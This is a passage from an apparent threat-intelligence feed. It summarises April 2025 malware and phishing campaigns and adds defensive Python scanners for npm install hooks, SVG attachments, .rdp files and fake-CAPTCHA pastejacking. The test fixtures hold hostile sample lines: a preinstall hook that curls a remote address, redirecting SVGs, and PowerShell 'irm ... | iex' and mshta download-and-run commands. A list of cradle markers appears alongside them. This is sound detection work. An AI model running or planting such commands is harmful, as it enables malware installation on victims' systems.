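    scripts = package_json.get("scripts") or {}
    return {hook: cmd for hook, cmd in scripts.items() if hook in INSTALL_HOOKS}


def is_suspicious(command: str) -> bool:
    lowered = command.lower()
    return any(marker in lowered for marker in SUSPICIOUS_MARKERS)


def scan_node_modules(root: str) -> list:
    """Walk a node_modules tree and report every install-time hook.

    Returns (package name, hook, command, suspicious) tuples sorted by name.
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        path = os.path.join(dirpath, "package.json")
        try:
            with open(path, encoding="utf-8") as fh:
                pkg = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or not JSON; npm would not run anything from it either
        name = pkg.get("name") or os.path.relpath(dirpath, root)
        for hook, cmd in install_scripts(pkg).items():
            findings.append((name, hook, cmd, is_suspicious(cmd)))
    return sorted(findings)


def build_demo_tree() -> str:
    """Create a constructed node_modules tree: one hooked dropper-style package,
    one native addon with a legitimate install step, one package with no scripts."""
    root = tempfile.mkdtemp(prefix="node_modules_demo_")
    packages = {
        # hypothetical package; the command mirrors the preinstall pattern described above
        "example-preinstall-pkg": {
            "name": "example-preinstall-pkg",
            "version": "1.0.0",
            "scripts": {"preinstall": "node -e \"require('child_process').exec('curl https://203.0.113.7/c')\""},
        },
        "example-native-addon": {
            "name": "example-native-addon",
            "version": "2.3.1",
            "scripts": {"install": "node-gyp rebuild", "test": "mocha"},
        },
        "example-clean-pkg": {"name": "example-clean-pkg", "version": "0.1.0"},
    }
    for folder, manifest in packages.items():
        os.makedirs(os.path.join(root, folder))
        with open(os.path.join(root, folder, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return root


if __name__ == "__main__":
    for name, hook, cmd, bad in scan_node_modules(build_demo_tree()):
        print(f"{'!!' if bad else '  '} {name}: {hook} -> {cmd}")
```

Native addons (node-gyp rebuild, prebuild-install) legitimately use install hooks, so the list will never be empty on a real project; the point is to review what is there. The stronger control is to install with `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) in CI and on developer machines, then run `npm rebuild` only for the packages that genuinely need a build step.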
2025-04-13
Exploitation_of_CLFS_Lead_to_Ransomware_Activity
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Exploitation_of_CLFS_Lead_to_Ransomware_Activity
Date of Scan:
2025-04-13
Impact:
MEDIUM
Summary:
Microsoft researchers have discovered active exploitation of CVE-2025-29824, a vulnerability in the Windows Common Log File System (CLFS) driver. Attackers use the flaw after initial access to elevate privileges and take full control of compromised systems. Targets included IT and real estate companies in the U.S., a bank in Venezuela, a software company in Spain, and a retail business in Saudi Arabia. Microsoft attributes the exploitation to Storm-2460, which deployed the custom malware PipeMagic to exploit the vulnerability and then drop ransomware payloads.
Source: https://www.microsoft.com/en-us/security/blog/2025/04/08/exploitation-of-clfs-zero-day-leads-to-ransomware-activity/
2025-04-13
QuickBooks_Phishing_via_Google_Ads
LOW
+
Intel Source:
Malwarebytes
Intel Name:
QuickBooks_Phishing_via_Google_Ads
Date of Scan:
2025-04-13
Impact:
LOW
Summary:
Researchers from Malwarebytes have discovered a phishing campaign that uses Google Ads to target Intuit QuickBooks users during the US tax season. Threat actors exploit the April 15 tax deadline by purchasing fake Google Ads that look like genuine QuickBooks links. These advertisements guide users to convincing fake login sites that harvest usernames, passwords, and one-time passcodes (OTPs).
Source: https://www.malwarebytes.com/blog/scams/2025/04/tax-deadline-threat-quickbooks-phishing-scam-exploits-google-ads
2025-04-13
Obfuscated_SVG_Redirect_Attacks
LOW
+
Intel Source:
Forcepoint
Intel Name:
Obfuscated_SVG_Redirect_Attacks
Date of Scan:
2025-04-13
Impact:
LOW
Summary:
Forcepoint X-Labs researchers report that Scalable Vector Graphics (SVG) files are emerging as a new tactic for bypassing spam and phishing detection. Unlike raster formats such as JPEG or PNG, SVG files are XML, which allows embedded JavaScript and makes them an active attack vector rather than a passive image. Malicious SVG files are used in two main ways: inline attachments that render inside the email client with call-to-action buttons linking to phishing sites, and standalone attachments that trigger an automatic browser redirect when opened, bypassing URL scanning. Recent phishing campaigns have used SVG lures themed as voice notes, printer scans, remittance advice, and bank transfer details.
Source: https://www.forcepoint.com/blog/x-labs/obfuscated-svg-files-redirect-victims
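Because an SVG is XML, the test for "is this still just a picture" is a structural one, and it does not depend on spotting a URL that obfuscation may hide. The scanner below, added here as an example rather than Forcepoint's own tooling, walks the document and reports every feature a raster image cannot have: script elements, event-handler attributes, javascript: or data: hrefs, embedded HTML via foreignObject, and ordinary clickable links of the call-to-action kind. The three sample files and the login.example.invalid host are constructed for the demonstration.

```python
import xml.etree.ElementTree as ET


def _local(name: str) -> str:
    """Strip an XML namespace such as {http://www.w3.org/2000/svg} or the xlink one."""
    return name.rsplit("}", 1)[-1]


def svg_active_content(svg_text: str) -> list:
    """Return the reasons an SVG must be treated as active content; [] means a plain image."""
    reasons = []
    root = ET.fromstring(svg_text)
    for el in root.iter():
        tag = _local(el.tag)
        if tag == "script":
            reasons.append("<script> element")
        elif tag == "foreignObject":
            reasons.append("<foreignObject> (embedded HTML)")
        for attr, value in el.attrib.items():
            name = _local(attr).lower()       # xlink:href and href both end up as "href"
            v = value.strip().lower()
            if name.startswith("on"):         # onload, onclick, onbegin, ... all run script
                reasons.append(f"event handler {name} on <{tag}>")
            elif name == "href" and v.startswith(("javascript:", "vbscript:", "data:text/html")):
                reasons.append(f"href on <{tag}> uses scheme {v.split(':', 1)[0]}:")
            elif tag == "a" and name == "href" and v.startswith(("http://", "https://")):
                reasons.append(f"external link {value.strip()}")
    return reasons


# Constructed samples for the demonstration (not Forcepoint's captures).
PLAIN_IMAGE = """<svg xmlns="http://www.w3.org/2000/svg" width="64" height="64">
  <circle cx="32" cy="32" r="20" fill="steelblue"/>
</svg>"""

# Standalone-attachment style: opening the file in a browser redirects it.
REDIRECTING_SVG = """<svg xmlns="http://www.w3.org/2000/svg" onload="location.href='https://login.example.invalid/'">
  <text x="10" y="20">Voice message 00:42</text>
  <script>window.location = 'https://login.example.invalid/';</script>
</svg>"""

# Inline-attachment style: renders in the mail client with a call-to-action button.
CALL_TO_ACTION_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <a xlink:href="https://login.example.invalid/"><rect width="120" height="30"/><text x="5" y="20">Listen now</text></a>
</svg>"""

if __name__ == "__main__":
    for label, doc in (("plain", PLAIN_IMAGE), ("redirect", REDIRECTING_SVG), ("cta", CALL_TO_ACTION_SVG)):
        print(label, svg_active_content(doc))
```

For gateway use, parse with defusedxml rather than the stdlib parser so a hostile file cannot abuse entity expansion, and treat any non-empty result as grounds to strip or quarantine the attachment: a legitimate logo or diagram produces an empty list.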
2025-04-12
Phishing_Campaign_Targeting_Music_Websites
LOW
+
Intel Source:
Cofense
Intel Name:
Phishing_Campaign_Targeting_Music_Websites
Date of Scan:
2025-04-12
Impact:
LOW
Summary:
Researchers from Cofense have uncovered a phishing campaign targeting Spotify users to steal login credentials and credit card information. The attack starts with a phishing email claiming that the user's payment has failed. The link in the email leads to a Linktree page; clicking its Update Payment Method button redirects the user to a phishing site hosted on Microsoft's Azure App Service, which asks them to enter their Spotify credentials or reset their password. The submitted data is quietly sent to an attacker-controlled server. After capturing the login details, the phishing site redirects the user to a second fraudulent page that requests credit card information, which is sent to the same server.
Source: https://cofense.com/blog/more-than-music-the-unseen-cybersecurity-threats-of-streaming-services
2025-04-12
UAC_0219_PowerShell_Espionage
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
UAC_0219_PowerShell_Espionage
Date of Scan:
2025-04-12
Impact:
MEDIUM
Summary:
Researchers from CERT-UA have identified a cyber espionage campaign, attributed to the cluster tracked as UAC-0219, that targets Ukraine's public administration and critical infrastructure. The attackers use compromised accounts to send phishing emails linking to public file-sharing services that host VBScript-based loaders. The scripts run PowerShell commands that exfiltrate sensitive files using cURL, focusing on document and image formats.
Source: https://cert.gov.ua/article/6282902
2025-04-12
Coquettte_Using_Proton66_to_distribute_Malware
LOW
+
Intel Source:
DTI
Intel Name:
Coquettte_Using_Proton66_to_distribute_Malware
Date of Scan:
2025-04-12
Impact:
LOW
Summary:
DTI researchers have identified Proton66, a Russia-based bulletproof hosting provider that has become a safe harbor for cybercriminals, letting attackers run their operations without being shut down. One of its newer customers, Coquettte, is linked to Horrid, a group known for supporting unskilled cybercriminals. The researchers also found a fraudulent website offering antivirus software called CyberSecureProtect that actually distributes malware. A major OPSEC mistake left the site's malicious files publicly accessible, including a fake installer that contacts two suspicious URLs to download a second-stage payload. That payload was identified as Rugmi, a loader used to drop other malware such as info-stealers, keyloggers, remote access trojans, and ransomware.
Source: https://dti.domaintools.com/proton66-where-to-find-aspiring-hackers/
2025-04-12
The_Rise_of_HR_Themed_Phishing_Attacks
LOW
+
Intel Source:
Cofense
Intel Name:
The_Rise_of_HR_Themed_Phishing_Attacks
Date of Scan:
2025-04-12
Impact:
LOW
Summary:
Cofense researchers have uncovered an HR-themed phishing campaign that manipulates employees into sharing sensitive information. The phishing email impersonates a company called Human Capital and uses the subject line "Act Now: Q1 Updates Deadline March 31!" to pressure recipients. It also uses corporate language such as "staying aligned with our company objectives", setting goals, or submitting achievements to appear legitimate. The email contains a link labelled "Q1 Wrap-Up Hub" that leads to a JotForm survey asking for personal details. After submitting, the user is redirected to a spoofed Microsoft login page. If the recipient enters credentials, the attackers gain full access to the account, which can lead to account takeover, internal data breaches, malware deployment, ransomware attacks, and reputational damage.
Source: https://cofense.com/blog/q1-goals-to-gaps-in-security-the-rise-of-hr-themed-phishing
2025-04-11
Kimsuky_Targets_South_Korea_Again
LOW
+
Intel Source:
Seqrite Labs
Intel Name:
Kimsuky_Targets_South_Korea_Again
Date of Scan:
2025-04-11
Impact:
LOW
Summary:
Researchers at Seqrite Labs have discovered two active campaigns by the APT group Kimsuky (also known as Black Banshee) that use misleading tactics to target South Korean government entities. The campaigns used phishing emails with LNK (shortcut) file attachments that included obfuscated VBA scripts. After de-obfuscation, the scripts were discovered to drop a PDF and a ZIP file, the latter containing four malicious components: two log files, one VBA script, and a PowerShell script. These multi-stage infections were meant to avoid detection while gathering network-related information, indicating a reconnaissance motive.
Source: https://www.seqrite.com/blog/kimsuky-apt-south-korea-pdf-lures/
2025-04-11
A_Double_Edged_Email_Attack
LOW
+
Intel Source:
Cofense
Intel Name:
A_Double_Edged_Email_Attack
Date of Scan:
2025-04-11
Impact:
LOW
Summary:
Researchers at Cofense have uncovered a campaign that combines credential phishing with malware delivery. The attack starts with an email that appears to be a notification of an upcoming file deletion, creating urgency to act quickly. Clicking the link in the email leads to a file-sharing page hosting a PDF with two links, Preview and Download. Preview takes the user to a fake Microsoft login page designed to steal Office 365 credentials, while Download installs malware disguised as a legitimate OneDrive installer.
Source: https://cofense.com/blog/pick-your-poison-a-double-edged-email-attack
2025-04-11
Fake_Booking_Emails_Target_Hotels
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Fake_Booking_Emails_Target_Hotels
Date of Scan:
2025-04-11
Impact:
LOW
Summary:
Researchers at Malwarebytes have identified a phishing campaign in which cybercriminals use fake Booking.com emails to trick hotel staff. The scam starts with an email asking the hotel to confirm a booking. If staff click the link, they are taken to a website with a fake CAPTCHA page that silently copies a malicious command to the clipboard. When staff follow the "verification" steps, they unknowingly run the hidden command, which launches an mshta script that downloads and installs malware, giving the attackers a foothold to steal sensitive information or move further into the hotel's network.
Source: https://www.threatdown.com/blog/fake-booking-com-emails-target-hotels/
2025-04-10
Rogue_RDP_Espionage_Campaign
LOW
+
Intel Source:
Google Threat Intelligence
Intel Name:
Rogue_RDP_Espionage_Campaign
Date of Scan:
2025-04-10
Impact:
LOW
Summary:
Google Threat Intelligence Group researchers have discovered a new phishing campaign targeting European government and military organizations, which they attribute to the suspected Russia-linked group UNC5837. The campaign used signed .rdp file attachments to launch Remote Desktop Protocol sessions from victims' workstations, not for interactive control but to abuse lesser-known RDP features such as resource redirection and RemoteApps, which expose the victim's drives and clipboard to the attacker's server.
Source: https://cloud.google.com/blog/topics/threat-intelligence/windows-rogue-remote-desktop-protocol/
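An .rdp file is a plain list of name:type:value lines, so the settings that turn a session into a data channel can be checked before the file is ever opened. The parser below is added here as an example and is not Google's tooling: it reads the file, flags the redirection and RemoteApp settings when they are switched on, and notes the presence of a signature, since a valid signature only says who signed the file, not that it is safe. The two sample files and the rdp.example.invalid hosts are constructed; the signature value is a placeholder, not a real blob.

```python
from dataclasses import dataclass

# Settings a rogue .rdp file uses to turn a session into a data channel.
# Types: i = integer, s = string. A setting counts as enabled when its value
# is a non-zero integer or a non-empty string.
RISKY_SETTINGS = {
    "drivestoredirect": "local drives mapped into the session (the remote server can read and write them)",
    "redirectclipboard": "clipboard shared with the remote host",
    "redirectprinters": "local printers exposed to the remote host",
    "redirectsmartcards": "smart cards exposed to the remote host",
    "devicestoredirect": "plug-and-play devices redirected",
    "remoteapplicationmode": "RemoteApp instead of a desktop, so the victim never sees a remote session",
}


@dataclass
class RdpFinding:
    key: str
    value: str
    reason: str


def read_rdp_file(path: str) -> str:
    """mstsc typically saves .rdp files as UTF-16LE with a BOM; fall back to UTF-8."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data.startswith(b"\xff\xfe"):
        return data.decode("utf-16")
    return data.decode("utf-8-sig")


def parse_rdp(text: str) -> dict:
    """Parse 'name:type:value' lines into {name: (type, value)}.

    Names may contain spaces ('full address'), values may contain colons
    (host:port), and Windows treats names case-insensitively.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split(":", 2)
        if len(parts) != 3:
            continue
        name, typ, value = (p.strip() for p in parts)
        settings[name.lower()] = (typ.lower(), value)
    return settings


def _enabled(typ: str, value: str) -> bool:
    if typ == "i":
        return value not in ("", "0")
    return value != ""


def assess_rdp(text: str) -> list:
    """Return a finding for every risky setting that is switched on."""
    settings = parse_rdp(text)
    findings = []
    for key, reason in RISKY_SETTINGS.items():
        if key in settings and _enabled(*settings[key]):
            findings.append(RdpFinding(key, settings[key][1], reason))
    if "signature" in settings:
        findings.append(RdpFinding("signature", "(present)",
                                   "file is signed; the signature proves who signed it, not that it is safe"))
    return findings


# Constructed samples; the hosts are placeholders, not observed infrastructure.
ROGUE_RDP = """\
full address:s:rdp.example.invalid
remoteapplicationmode:i:1
drivestoredirect:s:*
redirectclipboard:i:1
redirectprinters:i:0
signscope:s:Full Address,Remote Application Mode,Drives To Redirect
signature:s:PLACEHOLDER-NOT-A-REAL-SIGNATURE
"""

ORDINARY_RDP = """\
full address:s:jump.corp.example.invalid
redirectclipboard:i:0
drivestoredirect:s:
"""

if __name__ == "__main__":
    for finding in assess_rdp(ROGUE_RDP):
        print(f"{finding.key}={finding.value}: {finding.reason}")
```

The combination the campaign relies on is visible in the first sample: drivestoredirect:s:* plus remoteapplicationmode:i:1 hands the remote side every local drive while showing the user only a single application window. Blocking .rdp attachments at the mail gateway, or at least running this check on them, removes the whole vector.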
2025-04-10
Kongtuke_Web_Inject_For_Fake_CAPTCHA_Page
LOW
+
Intel Source:
Palo Alto
Intel Name:
Kongtuke_Web_Inject_For_Fake_CAPTCHA_Page
Date of Scan:
2025-04-10
Impact:
LOW
Summary:
Palo Alto Networks Unit 42 researchers have identified an attack chain that starts with a malicious script injected into compromised legitimate websites. The script leads to a fake CAPTCHA page that hijacks the victim's clipboard (so-called "pastejacking") and instructs them to paste and run the copied command. Post-infection traffic resembles AsyncRAT activity, but the final malware remains unidentified and no sample is currently available.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-04-04-IOCs-forKongTuke-web-inject-leading-to-fake-CAPTHA-page.txt
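The fake-CAPTCHA chains in this entry and in the Booking.com entry above share one observable: the victim pastes the copied command into the Win+R Run box, which is hosted by explorer.exe, so the script host that runs it (mshta.exe, powershell.exe, cmd.exe) appears as a child of explorer.exe with a URL on its command line. The detection below is added here as an example, not Unit 42's or Malwarebytes' logic; it runs over constructed Sysmon-style process-creation events (field names parent_image, image and command_line are assumed, and 203.0.113.9 is a documentation address) and explains each hit.

```python
import json
import re
from typing import Optional

# Script hosts a pasted one-liner typically lands on.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                "msiexec.exe", "curl.exe", "rundll32.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# PowerShell download-and-execute cradle vocabulary.
CRADLE_MARKERS = ("irm ", "invoke-restmethod", "iwr ", "invoke-webrequest", "iex",
                  "invoke-expression", "downloadstring", "-enc", "frombase64string")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[str]:
    """Return why a process-creation event looks like a pasted Run-dialog payload, or None."""
    parent = _basename(event.get("parent_image", ""))
    image = _basename(event.get("image", ""))
    cmd = event.get("command_line", "")
    lowered = cmd.lower()
    if image not in SCRIPT_HOSTS:
        return None
    has_url = URL_RE.search(cmd) is not None
    reasons = []
    # The Run box lives in explorer.exe: a script host with a URL on its command line
    # and explorer.exe as parent is the user pasting what the fake CAPTCHA copied.
    if parent == "explorer.exe" and has_url:
        reasons.append("explorer.exe launched a script host with a URL (Run-dialog paste)")
    if image == "mshta.exe" and has_url:
        reasons.append("mshta.exe fetching a remote HTA")
    if (image in ("powershell.exe", "pwsh.exe")
            and any(m in lowered for m in CRADLE_MARKERS)
            and (has_url or "frombase64string" in lowered)):
        reasons.append("PowerShell download-and-execute cradle")
    return "; ".join(reasons) or None


def scan_log(jsonl: str) -> list:
    """Run classify() over JSON-lines process events; returns (image, reason) per hit."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        reason = classify(event)
        if reason:
            hits.append((_basename(event.get("image", "")), reason))
    return hits


# Constructed sample events (not real telemetry). Two pastejacking hits, one
# legitimate admin script, one ordinary user process.
SAMPLE_LOG = r"""
{"parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\mshta.exe", "command_line": "mshta https://203.0.113.9/verify.hta"}
{"parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell -w hidden -c \"irm https://203.0.113.9/x | iex\""}
{"parent_image": "C:\\Windows\\System32\\svchost.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"}
{"parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\notepad.exe", "command_line": "notepad C:\\Users\\staff\\notes.txt"}
"""

if __name__ == "__main__":
    for image, reason in scan_log(SAMPLE_LOG):
        print(f"{image}: {reason}")
```

Corroborate a hit with the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which keeps the literal text the user pasted into the Run box, and expect some noise from users who paste URLs into Run deliberately; the mshta and cradle reasons carry far more weight than the parent relationship alone.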
2025-04-09
Tactics_of_Gamaredon_and_ShadowPad
HIGH
+
Intel Source:
Hunt.IO
Intel Name:
Tactics_of_Gamaredon_and_ShadowPad
Date of Scan:
2025-04-09
Impact:
HIGH
Summary:
Hunt.io researchers have analyzed the ongoing infrastructure tactics employed by two distinct state-sponsored groups, Gamaredon (suspected Russian origin) and a cluster linked to RedFoxtrot/ShadowPad (suspected Chinese origin), highlighting their methods for maintaining operational resilience and stealth. Gamaredon continues its focus on Ukrainian government and civil society targets, alongside Western entities, Africa, and NATO states, utilizing a low-frequency, single-flux DNS technique with rapidly changing IP addresses, short TTLs, wildcard A records, and consistent reuse of a specific TLS certificate for its .ru domains, complicating takedown efforts. Concurrently, the RedFoxtrot-linked activity leverages dynamic DNS services, spoofed certificates (e.g., mimicking Microsoft), and JA4X fingerprinting across various VPS providers to stage infrastructure, delivering the modular ShadowPad backdoor via DLL side-loading using a legitimate but vulnerable executable, often orchestrated by PowerShell and batch scripts.
Source: https://hunt.io/blog/state-sponsored-activity-gamaredon-shadowpad
2025-04-09
Qilin_Ransomware_Targets_MSP_Admin
MEDIUM
+
Intel Source:
Sophos
Intel Name:
Qilin_Ransomware_Targets_MSP_Admin
Date of Scan:
2025-04-09
Impact:
MEDIUM
Summary:
Researchers at Sophos have discovered a Qilin ransomware affiliate using a phishing attack to compromise a Managed Service Provider administrator's ScreenConnect Remote Monitoring and Management tool. Using the evilginx adversary-in-the-middle framework, the attackers intercepted passwords and bypassed multi-factor authentication by creating a fake ScreenConnect login page. Once within the MSP's ScreenConnect Cloud portal, the threat actors installed Qilin ransomware, which affected downstream clients.
Source: https://news.sophos.com/en-us/2025/04/01/sophos-mdr-tracks-ongoing-campaign-by-qilin-affiliates-targeting-screenconnect/
2025-04-08
ViperSoftX_Malware_Distribution
LOW
+
Intel Source:
ASEC
Intel Name:
ViperSoftX_Malware_Distribution
Date of Scan:
2025-04-08
Impact:
LOW
Summary:
ASEC researchers have identified a campaign in which Arabic-speaking threat actors are distributing malware called ViperSoftX to users in South Korea. The malware spreads primarily through cracked software and torrent downloads and operates via PowerShell scripts that communicate with a C2 server using URLs containing specific paths. Once executed, it contacts the attacker's server to download a PowerShell script and a VBS file. The VBS file runs the script, which then downloads additional payloads such as PureCrypter and Quasar RAT.
Source: https://asec.ahnlab.com/ko/87336/
2025-04-08
Lazarus_Expands_NPM_Campaign_with_11_Packages
MEDIUM
+
Intel Source:
Socket
Intel Name:
Lazarus_Expands_NPM_Campaign_with_11_Packages
Date of Scan:
2025-04-08
Impact:
MEDIUM
Summary:
Lazarus-linked North Korean threat actors behind the Contagious Interview operation have expanded their npm malware campaign, introducing new RAT loaders and using hex obfuscation to evade detection. The latest malicious packages deliver BeaverTail malware and are designed to compromise developer systems, steal sensitive data, and maintain access. The group continues to create new npm accounts and deploy malicious code across npm, GitHub, and Bitbucket, with over 5,600 downloads across 11 packages.
Source: https://socket.dev/blog/lazarus-expands-malicious-npm-campaign-11-new-packages-add-malware-loaders-and-bitbucket
2025-04-08
HollowQuill_Malware_via_Research_PDFs
MEDIUM
+
Intel Source:
Seqrite
Intel Name:
HollowQuill_Malware_via_Research_PDFs
Date of Scan:
2025-04-08
Impact:
MEDIUM
Summary:
Researchers from SEQRITE Labs have discovered Operation HollowQuill, a targeted campaign that uses research-themed fake PDFs to infiltrate Russian academic and defense networks. The attack primarily targets the Baltic State Technical University (BSTU "VOENMEKH"), an important institution in Russia's military-industrial complex. Malicious RAR archives containing a .NET dropper are used to deploy a Golang-based shellcode loader alongside a legitimate OneDrive application and a decoy document.
Source: https://www.seqrite.com/blog/operation-hollowquill-russian-rd-networks-malware-pdf/
2025-04-07
ToddyCat_Exploits_ESET_Scanner
LOW
+
Intel Source:
Securelist
Intel Name:
ToddyCat_Exploits_ESET_Scanner
Date of Scan:
2025-04-07
Impact:
LOW
Summary:
Researchers from Securelist have observed the ToddyCat APT group using a stealthy tool called TCESB to execute malicious payloads while avoiding detection by running alongside legitimate security software. The attackers used CVE-2024-11859, a weakness in ESET's command-line scanner, to load a malicious DLL via DLL proxying. TCESB, based on modified EDRSandBlast code, disables key system monitoring functions by modifying kernel structures and uses a Bring Your Own Vulnerable Driver (BYOVD) approach with a vulnerable Dell driver (CVE-2021-36276).
Source: https://securelist.com/toddycat-apt-exploits-vulnerability-in-eset-software-for-dll-proxying/116086/
2025-04-07
UAC_0226_Espionage_GiftedRook_Stealer
LOW
+
Intel Source:
CERT-UA
Intel Name:
UAC_0226_Espionage_GiftedRook_Stealer
Date of Scan:
2025-04-07
Impact:
LOW
Summary:
Since February 2025, Ukraine's CERT-UA has been monitoring espionage activities targeting military, law enforcement, and government sectors, particularly along the eastern border. The attacks primarily involve emails with malicious XLSM attachments related to topics like demining, fines, and UAV production. These attachments contain base64-encoded strings that, when decoded by macros, deliver executable payloads. Two known malware tools have been identified: a .NET-based reverse-shell and a C/C++ stealer (GIFTEDCROOK) that exfiltrates browser data to Telegram. The threat cluster is tracked as UAC-0226.
Source: https://cert.gov.ua/article/6282946
2025-04-07
CrushFTP_CVE_2025_31161_Exploited
MEDIUM
+
Intel Source:
Huntress
Intel Name:
CrushFTP_CVE_2025_31161_Exploited
Date of Scan:
2025-04-07
Impact:
MEDIUM
Summary:
Huntress researchers have discovered active exploitation of CVE-2025-31161, a major authentication bypass issue that affects CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0. Successful exploitation grants attackers administrative access to the application, allowing for further compromise.
Source: https://www.huntress.com/blog/crushftp-cve-2025-31161-auth-bypass-and-post-exploitation
2025-04-07
New_Attack_Targeting_Apache_Tomcat_Servers
MEDIUM
+
Intel Source:
AquaSec
Intel Name:
New_Attack_Targeting_Apache_Tomcat_Servers
Date of Scan:
2025-04-07
Impact:
MEDIUM
Summary:
Aqua Nautilus researchers have uncovered a new attack campaign targeting Apache Tomcat servers, where attackers exploit weak credentials to gain access. They upload encrypted payloads that create backdoors and persistence mechanisms, deploying two binaries disguised as kernel processes. The attack, which affects both Windows and Linux systems, steals SSH credentials to spread laterally and hijacks resources for cryptocurrency mining. The campaign is linked to a new infrastructure, possibly connected to a Chinese-speaking threat actor.
Source: https://www.aquasec.com/blog/new-campaign-against-apache-tomcat/
2025-04-07
Neptune_RAT_Targets_Windows_Users
LOW
+
Intel Source:
Cyfirma
Intel Name:
Neptune_RAT_Targets_Windows_Users
Date of Scan:
2025-04-07
Impact:
LOW
Summary:
Researchers at CYFIRMA have found a new version of Neptune RAT, a powerful Windows-based remote access trojan with destructive capabilities and password exfiltration from over 270 software applications. This Visual Basic.NET malware, which was distributed via sites such as GitHub, Telegram, and YouTube, downloads and executes payloads hosted on catbox.moe using PowerShell commands (irm and iex).
Source: https://www.cyfirma.com/research/neptune-rat-an-advanced-windows-rat-with-system-destruction-capabilities-and-password-exfiltration-from-270-applications/
2025-04-06
Remcos_RAT_Disguised_as_Waybill
LOW
+
Intel Source:
ASEC
Intel Name:
Remcos_RAT_Disguised_as_Waybill
Date of Scan:
2025-04-06
Impact:
LOW
Summary:
Researchers at ASEC have identified a phishing campaign delivering Remcos RAT disguised as a waybill from a major shipping company. The attack begins with a malicious email containing an HTML script that downloads an obfuscated JavaScript file. This script then generates and executes several files, including a legitimate AutoIt loader that runs a malicious AutoIt script. The malware establishes persistence on the system and uses a series of API injections to run Remcos RAT inside a normal process, granting remote access and enabling data theft.
Source: https://asec.ahnlab.com/en/87106/
2025-04-06
Exploitation_of_Ivanti_Connect_Secure_Vulnerability
MEDIUM
+
Intel Source:
Mandiant
Intel Name:
Exploitation_of_Ivanti_Connect_Secure_Vulnerability
Date of Scan:
2025-04-06
Impact:
MEDIUM
Summary:
On April 3, 2025, Ivanti disclosed CVE-2025-22457, a critical buffer overflow vulnerability in its Connect Secure (ICS) VPN appliances that allows remote code execution. Researchers observed that attackers have been exploiting this vulnerability since March 2025, mainly targeting outdated ICS 9.X and 22.7R2.5 or earlier versions. Mandiant assesses that the China-linked espionage group UNC5221 is exploiting this vulnerability to deploy new malware strains called TRAILBLAZE and BRUSHFIRE. TRAILBLAZE is an in-memory dropper that injects the BRUSHFIRE backdoor, which hides inside the ICS web process. BRUSHFIRE then decrypts and runs hidden code, allowing attackers to control the system without being detected.
Source: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability/
2025-04-05
Skimming_Campaign_Exploits_Stripe_API
LOW
+
Intel Source:
Jscrambler
Intel Name:
Skimming_Campaign_Exploits_Stripe_API
Date of Scan:
2025-04-05
Impact:
LOW
Summary:
Researchers at Jscrambler have identified a sophisticated web skimming campaign that uses a deprecated Stripe API to check stolen payment details before exfiltration, guaranteeing that only valid card data is transferred to attackers. The campaign uses multiple JavaScript injections, with the final skimmer overlaying a fake Stripe iframe on checkout web pages.
Source: https://jscrambler.com/blog/stripe-api-skimming-campaign
2025-04-05
The_Rise_of_Hunters_International_Ransomware
MEDIUM
+
Intel Source:
Group IB
Intel Name:
The_Rise_of_Hunters_International_Ransomware
Date of Scan:
2025-04-05
Impact:
MEDIUM
Summary:
Group-IB researchers have analyzed the Hunters International ransomware operation, possibly launched in October 2023, which is set to rebrand as World Leaks, focusing solely on extortion. The group uses OSINT tools to extort victims via various channels and targets multiple OS architectures. Their ransomware no longer renames files or drops ransom notes from version 6 onward. They offer a tool, Storage Software, to collect exfiltrated data and facilitate victim interaction via a control panel. While similarities exist between Hunters International, Lynx, and INC Ransom, no concrete evidence links them as the same operation.
Source: https://www.group-ib.com/blog/hunters-international-ransomware-group/
2025-04-04
Signed_Binaries_Sideloaded_for_Compromise
LOW
+
Intel Source:
Ontinue
Intel Name:
Signed_Binaries_Sideloaded_for_Compromise
Date of Scan:
2025-04-04
Impact:
LOW
Summary:
Ontinue's Cyber Defence Centre has identified a sophisticated multi-stage attack using vishing, remote access tools, and living-off-the-land techniques. The threat actor exploited Microsoft Teams for social engineering, delivering a malicious PowerShell payload, then used Quick Assist for remote access. Signed binaries like TeamViewer.exe and a sideloaded malicious DLL (TV.dll) were deployed, followed by a JavaScript-based C2 backdoor via Node.js. The attack shares similarities with tactics used by the Storm-1811 group, known for leveraging vishing, Quick Assist, and social engineering for initial access.
Source: https://www.ontinue.com/resource/blog-signed-sideloaded-compromised/
2025-04-04
BeaverTail_and_Tropidoor_Spread_via_Emails
LOW
+
Intel Source:
ASEC
Intel Name:
BeaverTail_and_Tropidoor_Spread_via_Emails
Date of Scan:
2025-04-04
Impact:
LOW
Summary:
